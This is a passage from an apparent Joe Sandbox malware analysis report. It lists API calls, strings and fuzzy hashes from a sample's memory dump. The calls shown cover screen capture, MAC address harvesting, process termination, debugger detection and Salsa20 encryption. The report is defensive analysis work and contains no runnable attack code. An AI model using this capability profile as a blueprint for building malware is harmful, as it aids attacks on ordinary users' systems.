                                                                                                                                                                          • Part of subcall function 00BE49A0: GetDesktopWindow.USER32 ref: 00BE49FB
                                                                                                                                                                          • Part of subcall function 00BE49A0: GetProcessWindowStation.USER32(?,00BE4B72), ref: 00BE4A01
                                                                                                                                                                          • Part of subcall function 00BE49A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00BE4B72), ref: 00BE4A1C
                                                                                                                                                                          • Part of subcall function 00BE49A0: GetLastError.KERNEL32(?,00BE4B72), ref: 00BE4A2A
                                                                                                                                                                          • Part of subcall function 00BE49A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00BE4B72), ref: 00BE4A65
                                                                                                                                                                          • Part of subcall function 00BE49A0: _wcsstr.LIBCMT ref: 00BE4A8A
                                                                                                                                                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C12316
                                                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00C12323
                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00C12338
                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00C12341
                                                                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 00C1234E
                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00C1235C
                                                                                                                                                                        • GetObjectA.GDI32(00000000,00000018,?), ref: 00C1236E
                                                                                                                                                                        • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 00C123CA
                                                                                                                                                                        • GetBitmapBits.GDI32(?,?,00000000), ref: 00C123D6
                                                                                                                                                                        • SelectObject.GDI32(?,?), ref: 00C12436
                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00C1243D
                                                                                                                                                                        • DeleteDC.GDI32(?), ref: 00C1244A
                                                                                                                                                                        • DeleteDC.GDI32(?), ref: 00C12450
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                                                                                        • String ID: .\crypto\rand\rand_win.c$DISPLAY
                                                                                                                                                                        • API String ID: 151064509-1805842116
                                                                                                                                                                        • Opcode ID: b1c439f6932b88ecaadf07a0bc1e1c32a7f71427046d194defa802e4ff3f9874
                                                                                                                                                                        • Instruction ID: 21fd5e90011dca033dc27df1ed4043c29bd3cb0164a69ec04d5b2d0b8bd66d1b
                                                                                                                                                                        • Opcode Fuzzy Hash: b1c439f6932b88ecaadf07a0bc1e1c32a7f71427046d194defa802e4ff3f9874
                                                                                                                                                                        • Instruction Fuzzy Hash: 53418375944300AFD3105B759C86F6FBBF8FF8A711F000519FA54A62E1EBB198509BA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • _malloc.LIBCMT ref: 00B9E67F
                                                                                                                                                                          • Part of subcall function 00BB0C62: __FF_MSGBANNER.LIBCMT ref: 00BB0C79
                                                                                                                                                                          • Part of subcall function 00BB0C62: __NMSG_WRITE.LIBCMT ref: 00BB0C80
                                                                                                                                                                          • Part of subcall function 00BB0C62: RtlAllocateHeap.NTDLL(00DB0000,00000000,00000001,?,?,?,?,00BB3B69,?), ref: 00BB0CA5
                                                                                                                                                                        • _malloc.LIBCMT ref: 00B9E68B
                                                                                                                                                                        • _wprintf.LIBCMT ref: 00B9E69E
                                                                                                                                                                        • _free.LIBCMT ref: 00B9E6A4
                                                                                                                                                                          • Part of subcall function 00BB0BED: HeapFree.KERNEL32(00000000,00000000,?,00BB507F,00000000,00BB520D,00BB0CE9), ref: 00BB0C01
                                                                                                                                                                          • Part of subcall function 00BB0BED: GetLastError.KERNEL32(00000000,?,00BB507F,00000000,00BB520D,00BB0CE9), ref: 00BB0C13
                                                                                                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 00B9E6B9
                                                                                                                                                                        • _free.LIBCMT ref: 00B9E6C5
                                                                                                                                                                        • _malloc.LIBCMT ref: 00B9E6CD
                                                                                                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 00B9E6E0
                                                                                                                                                                        • _sprintf.LIBCMT ref: 00B9E720
                                                                                                                                                                        • _wprintf.LIBCMT ref: 00B9E732
                                                                                                                                                                        • _wprintf.LIBCMT ref: 00B9E73C
                                                                                                                                                                        • _free.LIBCMT ref: 00B9E745
                                                                                                                                                                        Strings
                                                                                                                                                                        • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 00B9E71A
                                                                                                                                                                        • Address: %s, mac: %s, xrefs: 00B9E72D
                                                                                                                                                                        • Error allocating memory needed to call GetAdaptersinfo, xrefs: 00B9E699
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                                                                                                                                                                        • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                                                                                                                                                        • API String ID: 3901070236-1604013687
                                                                                                                                                                        • Opcode ID: cba6928db5e988c5f3794dbca68e077fd93e0517ca07e454f08e6510bfbcdd2e
                                                                                                                                                                        • Instruction ID: fe354fcf72fe29bea5f86798f64e6156d9adcafe278811a170164074c585c8a1
                                                                                                                                                                        • Opcode Fuzzy Hash: cba6928db5e988c5f3794dbca68e077fd93e0517ca07e454f08e6510bfbcdd2e
                                                                                                                                                                        • Instruction Fuzzy Hash: D111E7B25146547FC671B2B45C12FFF7ADCCB46712F0405E5FA9CD2141E6989A0493B1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BA1AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BA1ACA
                                                                                                                                                                          • Part of subcall function 00BA1AB0: DispatchMessageW.USER32(?), ref: 00BA1AE0
                                                                                                                                                                          • Part of subcall function 00BA1AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BA1AEE
                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000), ref: 00BA0346
                                                                                                                                                                        • _memmove.LIBCMT ref: 00BA0427
                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 00BA048E
                                                                                                                                                                        • _memmove.LIBCMT ref: 00BA0514
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 273148273-0
                                                                                                                                                                        • Opcode ID: 5222d9848895e28d9bc45253daecaa866ea57cbc8c22ac58387e009c50ead095
                                                                                                                                                                        • Instruction ID: 8cd4da067d078aee5aec50c885b8ed5bfce1c181cd3aca838f29502091c701e1
                                                                                                                                                                        • Opcode Fuzzy Hash: 5222d9848895e28d9bc45253daecaa866ea57cbc8c22ac58387e009c50ead095
                                                                                                                                                                        • Instruction Fuzzy Hash: 8342AF70D14208DBDF14EFA8C885BEEB7F5FF19308F2041A9E405A7251EB75AA45CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3232302685-0
                                                                                                                                                                        • Opcode ID: 51fb04fddbfcb12c70fa28d42b75f693d33e52316a1e09bb6b00dea397bec6ed
                                                                                                                                                                        • Instruction ID: bba2004e6dd673320710f17899889a62ef68a838ff8181a5209c29749342ec4d
                                                                                                                                                                        • Opcode Fuzzy Hash: 51fb04fddbfcb12c70fa28d42b75f693d33e52316a1e09bb6b00dea397bec6ed
                                                                                                                                                                        • Instruction Fuzzy Hash: 91B15970D142099BDF20EFA4C885BEEB7F5FF15318F1040B9E409AB251EB759A45CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00BA244F
                                                                                                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00BA2469
                                                                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BA24A1
                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000009), ref: 00BA24B0
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00BA24B7
                                                                                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00BA24C1
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00BA24CD
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                                                                                        • String ID: cmd.exe
                                                                                                                                                                        • API String ID: 2696918072-723907552
                                                                                                                                                                        • Opcode ID: 7fa27060f362950a91e05b77fc81629a72832a7e06b24d7fda0c708a054d8c76
                                                                                                                                                                        • Instruction ID: 2fee51e465a52a5aa8a25946172565f6704307948751eca5439f8dfcfd497352
                                                                                                                                                                        • Opcode Fuzzy Hash: 7fa27060f362950a91e05b77fc81629a72832a7e06b24d7fda0c708a054d8c76
                                                                                                                                                                        • Instruction Fuzzy Hash: 210175395013157FEB206BA5AC8DFAF77ACEF49755F0000A1FE08E2141EB7499848AB1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • _wcscmp.LIBCMT ref: 00BC82B9
                                                                                                                                                                        • _wcscmp.LIBCMT ref: 00BC82CA
                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00BC8568,?,00000000), ref: 00BC82E6
                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00BC8568,?,00000000), ref: 00BC8310
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InfoLocale_wcscmp
                                                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                                                        • API String ID: 1351282208-711371036
                                                                                                                                                                        • Opcode ID: 2560fde3ad6ba0693194845b10689d3caff6c99ea3439b01ca46514cac92ef51
                                                                                                                                                                        • Instruction ID: af220a9f957c7ab4669ff571d1338565ee1471354171915b10b35af14b5d9b51
                                                                                                                                                                        • Opcode Fuzzy Hash: 2560fde3ad6ba0693194845b10689d3caff6c99ea3439b01ca46514cac92ef51
                                                                                                                                                                        • Instruction Fuzzy Hash: 6D014075204A26ABDB219E58DC89FDA37D8EF05B61F0080A9F504DB091EF70DA80C798
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: Auth$Genu$cAMD$enti$ineI$ntel
                                                                                                                                                                        • API String ID: 0-1714976780
                                                                                                                                                                        • Opcode ID: 5f5d6626ad0f6917a330496c5e5681d55bc31fb8fcfe0306b7157049ee0a44b3
                                                                                                                                                                        • Instruction ID: c4dd9fe4ee7d104fd1e03ce332917ea5feb217cedaef7a525328932c1bf9e322
                                                                                                                                                                        • Opcode Fuzzy Hash: 5f5d6626ad0f6917a330496c5e5681d55bc31fb8fcfe0306b7157049ee0a44b3
                                                                                                                                                                        • Instruction Fuzzy Hash: 49312527A145671BFF78587C988537D20C3D391370F2ACFBAD226D35D4E86A8D812250
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        • input != nullptr && output != nullptr, xrefs: 00B9C095
                                                                                                                                                                        • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 00B9C090
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __wassert
                                                                                                                                                                        • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                                                                                                                                                        • API String ID: 3993402318-1975116136
                                                                                                                                                                        • Opcode ID: 45c58f080f3043b5ef21c1cb3b4c06dfc72e14e9e5d1f61f2ba86ba8ca41510d
                                                                                                                                                                        • Instruction ID: f9419c5b257953f51ebc710c52b9fd8ef98630dac53ca46d658eac7932b2f1c6
                                                                                                                                                                        • Opcode Fuzzy Hash: 45c58f080f3043b5ef21c1cb3b4c06dfc72e14e9e5d1f61f2ba86ba8ca41510d
                                                                                                                                                                        • Instruction Fuzzy Hash: C4C18CB5E002099FCF54CFA9C885ADEFBF1FF48300F24856AE919E7201E334AA558B54
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 00BB419D
                                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 00BB4252
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DebuggerPresent_memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2328436684-0
                                                                                                                                                                        • Opcode ID: 0de71eaad95679bd7a2f1b56466d29e36caddf8a80b71931b78e302736b454be
                                                                                                                                                                        • Instruction ID: 4b274d1d31462cd2095c36ada167d6c0df067541a7d05edc77490eedacd09ce4
                                                                                                                                                                        • Opcode Fuzzy Hash: 0de71eaad95679bd7a2f1b56466d29e36caddf8a80b71931b78e302736b454be
                                                                                                                                                                        • Instruction Fuzzy Hash: A131B27591122C9BCB21DF68D9897D8BBF8FF08310F5042EAE80CA6251EB749F858F45
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CryptDestroyHash.ADVAPI32(?), ref: 00BA1190
                                                                                                                                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00BA11A0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Crypt$ContextDestroyHashRelease
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3989222877-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CryptDestroyHash.ADVAPI32(?), ref: 00B9EA69
                                                                                                                                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00B9EA79
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Crypt$ContextDestroyHashRelease
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3989222877-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CryptDestroyHash.ADVAPI32(?), ref: 00B9EC80
                                                                                                                                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00B9EC90
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Crypt$ContextDestroyHashRelease
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3989222877-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00BB4266,?,?,?,00000001), ref: 00BC29F1
                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00BC29FA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • EnumSystemLocalesW.KERNEL32(00BC87B4,00000001,?,00BC76BC,00BC775A,00000003,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00BC87F6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: EnumLocalesSystem
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2099609381-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,20001004,?,00BB580F,?,00BB580F,?,20001004,?,00000002,?,00000004,?,00000000), ref: 00BC8875
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2299586839-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(?,?,00BC1DA6,00BC1D5B), ref: 00BC29C1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                        • Opcode ID: 76604328631378ad304327e07f972471bf97d1f93027cd320a3d095b5826fa90
                                                                                                                                                                        • Instruction ID: 8b546b436f791cc75571dc9bb7263ee30ed76e7d88c1dcaef819d575ad68f08e
                                                                                                                                                                        • Opcode Fuzzy Hash: 76604328631378ad304327e07f972471bf97d1f93027cd320a3d095b5826fa90
                                                                                                                                                                        • Instruction Fuzzy Hash: 9CA0113000030CAB8A002B82EC08A8E3F2CEA002AAB008022F80C000328B22A8A08A80
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00BB3FED,00C97990,00000014), ref: 00BB78D5
                                                                                                                                                                        Memory Dump Source
